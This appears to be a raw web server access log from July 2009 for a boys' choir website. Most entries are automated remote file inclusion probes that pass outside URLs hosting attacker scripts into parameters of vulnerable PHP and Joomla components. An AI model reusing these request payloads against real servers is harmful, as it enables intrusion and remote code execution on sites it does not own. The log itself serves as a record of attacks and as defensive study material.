67.19.130.218 - - [04/Jul/2009:13:58:20 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:13:58:48 -0700] "GET /logs/access_090629.log/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:02:00 -0700] "GET /logs/access_090414.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:02:00 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:02:01 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:14:02:12 -0700] "GET /logs//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:14:02:27 -0700] "GET /?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:02:28 -0700] "GET /logs/access_090414.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:02:28 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:02:28 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:02:34 -0700] "GET /?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:02:34 -0700] "GET /logs/?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:02:35 -0700] "GET /logs/access.log%20%20/?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:03:02 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:14:03:52 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:05:11 -0700] "GET /logs/access_090414.log%20%20///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:05:25 -0700] "GET /logs/access_090414.log%20%20///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:06:09 -0700] "GET /logs/access_090603.log%20%20///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:06:14 -0700] "GET /logs/access_090603.log%20%20///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.77.172.161 - - [04/Jul/2009:14:12:23 -0700] "GET / HTTP/1.1" 200 1724 "http://www.trauma-pages.com/support.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)" "www.americanboyschoir.com"
74.77.172.161 - - [04/Jul/2009:14:12:23 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:12:44 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:12:44 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:12:44 -0700] "GET /logs/access_090626.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:13:00 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:13:00 -0700] "GET /logs/access_090626.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:13:00 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:13:06 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.10.191.220 - - [04/Jul/2009:14:13:20 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.10.191.220 - - [04/Jul/2009:14:13:20 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:13:20 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.10.191.220 - - [04/Jul/2009:14:13:20 -0700] "GET /logs/access_090622.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:31 -0700] "GET /logs/access_090629.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:31 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:31 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:31 -0700] "GET /logs/access_090629.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:31 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:31 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:37 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:37 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:13:37 -0700] "GET /logs/access_090629.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:09 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:09 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:09 -0700] "GET /logs/access_090629.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:09 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:10 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:10 -0700] "GET /logs/access_090629.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:41 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:43 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:14:46 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:15:16 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:14:15:24 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:14:15:46 -0700] "GET /logs/access_090626.log//adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:14:15:46 -0700] "GET /logs//adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:14:15:46 -0700] "GET /adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:02 -0700] "GET /logs/access_090626.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:02 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:06 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:09 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:16:09 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:14:16:23 -0700] "GET /logs/access.log//adminstrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.10.191.220 - - [04/Jul/2009:14:17:03 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.205.57.2 - - [04/Jul/2009:14:18:27 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
210.205.57.2 - - [04/Jul/2009:14:18:27 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
210.205.57.2 - - [04/Jul/2009:14:18:29 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:19:01 -0700] "GET /logs/access_090626.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:19:07 -0700] "GET /logs/access_090629.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:19:19 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:14:19:24 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:19:47 -0700] "GET /logs/access_090626.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:14:19:47 -0700] "GET /logs/access_090626.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:14:21:24 -0700] "GET /logs/access_090629.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:21:32 -0700] "GET /logs//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:21:32 -0700] "GET /allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:21:32 -0700] "GET /logs/access_090626.log%20%20//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:21:38 -0700] "GET /logs/access.log%20%20//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:14:23:05 -0700] "GET /logs/access_090629.log/index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:14:23:12 -0700] "GET /logs/access_090629.log/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:30:53 -0700] "GET /logs//vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:30:53 -0700] "GET /vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:14:30:53 -0700] "GET /logs/access_090626.log%20%20//vwar/backup/errors.php?error=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:34:07 -0700] "GET /logs/access_090626.log//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:34:08 -0700] "GET /logs/access.log//allopass-error.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:14:35:38 -0700] "GET /allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:14:35:38 -0700] "GET /logs//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:14:35:50 -0700] "GET /logs/access_090626.log%20%20//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:14:35:50 -0700] "GET /logs/access.log%20%20//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:14:38:41 -0700] "GET /logs/access.log//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:14:38:41 -0700] "GET /logs/access_090626.log//allopass-error.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:14:45:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:14:45:49 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:14:45:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:46:57 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:46:57 -0700] "GET /logs/access_090603.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:46:57 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:47:11 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:47:11 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:47:11 -0700] "GET /logs/access_090603.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:48:31 -0700] "GET /logs/access.log//oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:14:48:44 -0700] "GET /logs/access.log//oneadmin/faqsupport/samplefaqsupport.php?path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
